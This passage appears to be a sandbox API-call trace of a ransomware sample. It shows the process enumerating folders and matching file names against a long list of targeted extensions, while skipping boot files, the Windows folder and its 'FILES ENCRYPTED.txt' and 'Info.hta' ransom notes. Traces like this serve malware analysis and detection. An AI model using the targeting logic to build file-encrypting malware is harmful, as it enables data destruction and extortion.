	[0032.831] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".avs") returned 4
	[0032.831] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".backup") returned 7
	[0032.831] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1
	[0032.831] lstrlenW (lpString=".bak") returned 4
	[0032.831] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".bay") returned 4
	[0032.831] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".bd") returned 3
	[0032.831] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1
	[0032.831] lstrlenW (lpString=".bin") returned 4
	[0032.831] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".bmp") returned 4
	[0032.831] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".bz2") returned 4
	[0032.831] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".c") returned 2
	[0032.831] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1
	[0032.831] lstrlenW (lpString=".cdr") returned 4
	[0032.831] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".cer") returned 4
	[0032.831] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".cf") returned 3
	[0032.831] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1
	[0032.831] lstrlenW (lpString=".cfc") returned 4
	[0032.831] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".cfm") returned 4
	[0032.831] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".cfml") returned 5
	[0032.832] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1
	[0032.832] lstrlenW (lpString=".cfu") returned 4
	[0032.832] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".chm") returned 4
	[0032.832] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".cin") returned 4
	[0032.832] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".class") returned 6
	[0032.832] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1
	[0032.832] lstrlenW (lpString=".clx") returned 4
	[0032.832] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".config") returned 7
	[0032.832] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1
	[0032.832] lstrlenW (lpString=".cpp") returned 4
	[0032.832] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".cr2") returned 4
	[0032.832] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".crt") returned 4
	[0032.832] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".crw") returned 4
	[0032.832] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".cs") returned 3
	[0032.832] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1
	[0032.832] lstrlenW (lpString=".css") returned 4
	[0032.832] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".csv") returned 4
	[0032.832] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".cub") returned 4
	[0032.832] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".dae") returned 4
	[0032.832] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".dat") returned 4
	[0032.832] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1
	[0032.832] lstrlenW (lpString=".db") returned 3
	[0032.833] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1
	[0032.833] lstrlenW (lpString=".dbf") returned 4
	[0032.833] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dbx") returned 4
	[0032.833] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dc3") returned 4
	[0032.833] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dcm") returned 4
	[0032.833] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dcr") returned 4
	[0032.833] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".der") returned 4
	[0032.833] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dib") returned 4
	[0032.833] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dic") returned 4
	[0032.833] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dif") returned 4
	[0032.833] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".divx") returned 5
	[0032.833] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1
	[0032.833] lstrlenW (lpString=".djvu") returned 5
	[0032.833] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1
	[0032.833] lstrlenW (lpString=".dng") returned 4
	[0032.833] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".doc") returned 4
	[0032.833] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".docm") returned 5
	[0032.833] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1
	[0032.833] lstrlenW (lpString=".docx") returned 5
	[0032.833] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0032.833] lstrlenW (lpString=".dot") returned 4
	[0032.833] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1
	[0032.833] lstrlenW (lpString=".dotm") returned 5
	[0032.834] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1
	[0032.834] lstrlenW (lpString=".dotx") returned 5
	[0032.834] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1
	[0032.834] lstrlenW (lpString=".dpx") returned 4
	[0032.834] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".dqy") returned 4
	[0032.834] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".dsn") returned 4
	[0032.834] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".dt") returned 3
	[0032.834] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1
	[0032.834] lstrlenW (lpString=".dtd") returned 4
	[0032.834] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".dwg") returned 4
	[0032.834] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".dwt") returned 4
	[0032.834] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".dx") returned 3
	[0032.834] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1
	[0032.834] lstrlenW (lpString=".dxf") returned 4
	[0032.834] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".edml") returned 5
	[0032.834] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1
	[0032.834] lstrlenW (lpString=".efd") returned 4
	[0032.834] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".elf") returned 4
	[0032.834] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".emf") returned 4
	[0032.834] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".emz") returned 4
	[0032.834] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".epf") returned 4
	[0032.834] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1
	[0032.834] lstrlenW (lpString=".eps") returned 4
	[0032.835] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".epsf") returned 5
	[0032.835] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1
	[0032.835] lstrlenW (lpString=".epsp") returned 5
	[0032.835] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1
	[0032.835] lstrlenW (lpString=".erf") returned 4
	[0032.835] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".exr") returned 4
	[0032.835] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".f4v") returned 4
	[0032.835] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".fido") returned 5
	[0032.835] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1
	[0032.835] lstrlenW (lpString=".flm") returned 4
	[0032.835] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".flv") returned 4
	[0032.835] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".frm") returned 4
	[0032.835] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".fxg") returned 4
	[0032.835] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".geo") returned 4
	[0032.835] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".gif") returned 4
	[0032.835] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".grs") returned 4
	[0032.835] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1
	[0032.835] lstrlenW (lpString=".gz") returned 3
	[0032.835] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1
	[0032.835] lstrlenW (lpString=".h") returned 2
	[0032.835] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1
	[0032.835] lstrlenW (lpString=".hdr") returned 4
	[0032.835] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".hpp") returned 4
	[0032.836] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".hta") returned 4
	[0032.836] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".htc") returned 4
	[0032.836] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".htm") returned 4
	[0032.836] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".html") returned 5
	[0032.836] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1
	[0032.836] lstrlenW (lpString=".icb") returned 4
	[0032.836] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".ics") returned 4
	[0032.836] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".iff") returned 4
	[0032.836] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".inc") returned 4
	[0032.836] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString=".indd") returned 5
	[0032.836] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1
	[0032.836] lstrlenW (lpString=".ini") returned 4
	[0032.836] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0
	[0032.836] lstrlenW (lpString="desktop.ini") returned 11
	[0032.836] lstrlenW (lpString=".bot") returned 4
	[0032.836] lstrcmpiW (lpString1=".bot", lpString2=".ini") returned -1
	[0032.836] lstrlenW (lpString="desktop.ini") returned 11
	[0032.836] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1
	[0032.836] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1
	[0032.836] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1
	[0032.836] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1
	[0032.836] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1
	[0032.836] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="desktop.ini") returned 1
	[0032.836] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1
	[0032.836] lstrcmpiW (lpString1="gjfkyfli", lpString2="desktop.ini") returned 1
	[0032.837] lstrcmpiW (lpString1=".exe", lpString2="desktop.ini") returned -1
	[0032.837] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0032.837] FindNextFileW (in: hFindFile=0xb4010a0, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0032.837] FindClose (in: hFindFile=0xb4010a0 | out: hFindFile=0xb4010a0) returned 1
	[0032.837] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb3f1098 | out: hHeap=0x7d60000) returned 1
	[0032.837] FindNextFileW (in: hFindFile=0xb3f0050, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0
	[0032.837] FindClose (in: hFindFile=0xb3f0050 | out: hFindFile=0xb3f0050) returned 1
	[0032.837] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb3e0048 | out: hHeap=0x7d60000) returned 1
	[0032.837] FindNextFileW (in: hFindFile=0x7e5ba40, lpFindFileData=0xa91fd00 | out: lpFindFileData=0xa91fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1
	[0032.837] lstrlenW (lpString="C:\\Boot") returned 7
	[0032.837] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1
	[0032.837] lstrlenW (lpString="Boot") returned 4
	[0032.837] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1
	[0032.837] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb3e0048
	[0032.837] lstrlenW (lpString="C:\\Boot") returned 7
	[0032.837] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ca88
	[0032.838] FindNextFileW (in: hFindFile=0x7e5ca88, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.838] FindNextFileW (in: hFindFile=0x7e5ca88, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1
	[0032.838] lstrlenW (lpString="BCD") returned 3
	[0032.838] lstrlenW (lpString=".1cd") returned 4
	[0032.838] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".3ds") returned 4
	[0032.838] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".3fr") returned 4
	[0032.838] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".3g2") returned 4
	[0032.838] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".3gp") returned 4
	[0032.838] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".7z") returned 3
	[0032.838] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1
	[0032.838] lstrlenW (lpString=".accda") returned 6
	[0032.838] lstrcmpiW (lpString1=".accda", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".accdb") returned 6
	[0032.838] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".accdc") returned 6
	[0032.838] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".accde") returned 6
	[0032.838] lstrcmpiW (lpString1=".accde", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".accdt") returned 6
	[0032.838] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1
	[0032.838] lstrlenW (lpString=".accdw") returned 6
	[0032.838] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".adb") returned 4
	[0032.839] lstrcmpiW (lpString1=".adb", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".adp") returned 4
	[0032.839] lstrcmpiW (lpString1=".adp", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ai") returned 3
	[0032.839] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1
	[0032.839] lstrlenW (lpString=".ai3") returned 4
	[0032.839] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ai4") returned 4
	[0032.839] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ai5") returned 4
	[0032.839] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ai6") returned 4
	[0032.839] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ai7") returned 4
	[0032.839] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ai8") returned 4
	[0032.839] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".anim") returned 5
	[0032.839] lstrcmpiW (lpString1=".anim", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".arw") returned 4
	[0032.839] lstrcmpiW (lpString1=".arw", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".as") returned 3
	[0032.839] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1
	[0032.839] lstrlenW (lpString=".asa") returned 4
	[0032.839] lstrcmpiW (lpString1=".asa", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".asc") returned 4
	[0032.839] lstrcmpiW (lpString1=".asc", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".ascx") returned 5
	[0032.839] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".asm") returned 4
	[0032.839] lstrcmpiW (lpString1=".asm", lpString2="") returned 1
	[0032.839] lstrlenW (lpString=".asmx") returned 5
	[0032.839] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".asp") returned 4
	[0032.840] lstrcmpiW (lpString1=".asp", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".aspx") returned 5
	[0032.840] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".asr") returned 4
	[0032.840] lstrcmpiW (lpString1=".asr", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".asx") returned 4
	[0032.840] lstrcmpiW (lpString1=".asx", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".avi") returned 4
	[0032.840] lstrcmpiW (lpString1=".avi", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".avs") returned 4
	[0032.840] lstrcmpiW (lpString1=".avs", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".backup") returned 7
	[0032.840] lstrcmpiW (lpString1=".backup", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".bak") returned 4
	[0032.840] lstrcmpiW (lpString1=".bak", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".bay") returned 4
	[0032.840] lstrcmpiW (lpString1=".bay", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".bd") returned 3
	[0032.840] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1
	[0032.840] lstrlenW (lpString=".bin") returned 4
	[0032.840] lstrcmpiW (lpString1=".bin", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".bmp") returned 4
	[0032.840] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".bz2") returned 4
	[0032.840] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".c") returned 2
	[0032.840] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1
	[0032.840] lstrlenW (lpString=".cdr") returned 4
	[0032.840] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".cer") returned 4
	[0032.840] lstrcmpiW (lpString1=".cer", lpString2="") returned 1
	[0032.840] lstrlenW (lpString=".cf") returned 3
	[0032.841] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1
	[0032.841] lstrlenW (lpString=".cfc") returned 4
	[0032.841] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cfm") returned 4
	[0032.841] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cfml") returned 5
	[0032.841] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cfu") returned 4
	[0032.841] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".chm") returned 4
	[0032.841] lstrcmpiW (lpString1=".chm", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cin") returned 4
	[0032.841] lstrcmpiW (lpString1=".cin", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".class") returned 6
	[0032.841] lstrcmpiW (lpString1=".class", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".clx") returned 4
	[0032.841] lstrcmpiW (lpString1=".clx", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".config") returned 7
	[0032.841] lstrcmpiW (lpString1=".config", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cpp") returned 4
	[0032.841] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cr2") returned 4
	[0032.841] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".crt") returned 4
	[0032.841] lstrcmpiW (lpString1=".crt", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".crw") returned 4
	[0032.841] lstrcmpiW (lpString1=".crw", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cs") returned 3
	[0032.841] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1
	[0032.841] lstrlenW (lpString=".css") returned 4
	[0032.841] lstrcmpiW (lpString1=".css", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".csv") returned 4
	[0032.841] lstrcmpiW (lpString1=".csv", lpString2="") returned 1
	[0032.841] lstrlenW (lpString=".cub") returned 4
	[0032.842] lstrcmpiW (lpString1=".cub", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dae") returned 4
	[0032.842] lstrcmpiW (lpString1=".dae", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dat") returned 4
	[0032.842] lstrcmpiW (lpString1=".dat", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".db") returned 3
	[0032.842] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1
	[0032.842] lstrlenW (lpString=".dbf") returned 4
	[0032.842] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dbx") returned 4
	[0032.842] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dc3") returned 4
	[0032.842] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dcm") returned 4
	[0032.842] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dcr") returned 4
	[0032.842] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".der") returned 4
	[0032.842] lstrcmpiW (lpString1=".der", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dib") returned 4
	[0032.842] lstrcmpiW (lpString1=".dib", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dic") returned 4
	[0032.842] lstrcmpiW (lpString1=".dic", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dif") returned 4
	[0032.842] lstrcmpiW (lpString1=".dif", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".divx") returned 5
	[0032.842] lstrcmpiW (lpString1=".divx", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".djvu") returned 5
	[0032.842] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".dng") returned 4
	[0032.842] lstrcmpiW (lpString1=".dng", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".doc") returned 4
	[0032.842] lstrcmpiW (lpString1=".doc", lpString2="") returned 1
	[0032.842] lstrlenW (lpString=".docm") returned 5
	[0032.843] lstrcmpiW (lpString1=".docm", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".docx") returned 5
	[0032.843] lstrcmpiW (lpString1=".docx", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dot") returned 4
	[0032.843] lstrcmpiW (lpString1=".dot", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dotm") returned 5
	[0032.843] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dotx") returned 5
	[0032.843] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dpx") returned 4
	[0032.843] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dqy") returned 4
	[0032.843] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dsn") returned 4
	[0032.843] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dt") returned 3
	[0032.843] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1
	[0032.843] lstrlenW (lpString=".dtd") returned 4
	[0032.843] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1
	[0032.843] lstrlenW (lpString=".dwg") returned 4
